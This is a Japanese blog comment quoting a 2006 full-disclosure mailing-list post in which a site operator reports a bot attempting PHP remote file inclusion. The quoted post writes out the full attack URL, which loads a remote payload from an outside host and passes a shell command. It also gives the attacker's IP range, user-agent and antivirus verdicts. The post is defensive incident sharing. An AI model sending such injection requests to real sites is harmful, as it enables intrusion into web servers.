« 脆弱性の販売WMFアップデート »

1 コメント

コメント from: Yasuo Ohgaki [メンバー] メール
Yasuo Ohgaki別の攻撃もあるようですね。
full-disclosureから。


Hello

we got hit by whats looks like a bot
trying to inject PHP.Chaploit in our sites

Host is in 202.226.224.*
User-Agent : lwp-trivial/1.35

the bot hit one of our dynamic pages (ASP)
trying to inject the PHP script located on
http://www.foxcf.hpgvip.com.br/cse.gif

Full URL was

ourpage.asp?ID=ID=http://www.foxcf.hpgvip.com.br/cse.gif?&cmd=cat%20bugado

obviously trying to inject PHP in ASP isnt a good idea,
thats what makes me think this is automated (and dumb) attack

Virustotal says :
AntiVir 6.33.0.75 01.09.2006 Linux/Rootkit
Avast 4.6.695.0 01.09.2006 PHP:Chaploit
Avira 6.33.0.75 01.09.2006 Linux/Rootkit
DrWeb 4.33 01.09.2006 PHP.Chaploit
Kaspersky 4.0.2.24 01.09.2006 Exploit.PHP.e
McAfee 4669 01.06.2006 PHP/Chaploit
(other didnt detect anything)

I also advised sysadmin of the web server hosting this
file.

i just wanted to share this information with the community

have a nice day

Maxime Ducharme

2006/01/10 @ 04:43

コメントを残す


Your email address will not be revealed on this site.

頂いたURLは表示されます。
PoorExcellent
(改行が自動で <br /> になります)
(Name, email & website)
(ユーザに、メッセージ・フォームを通じた連絡を許可します (あなたのメール・アドレスは表示されません))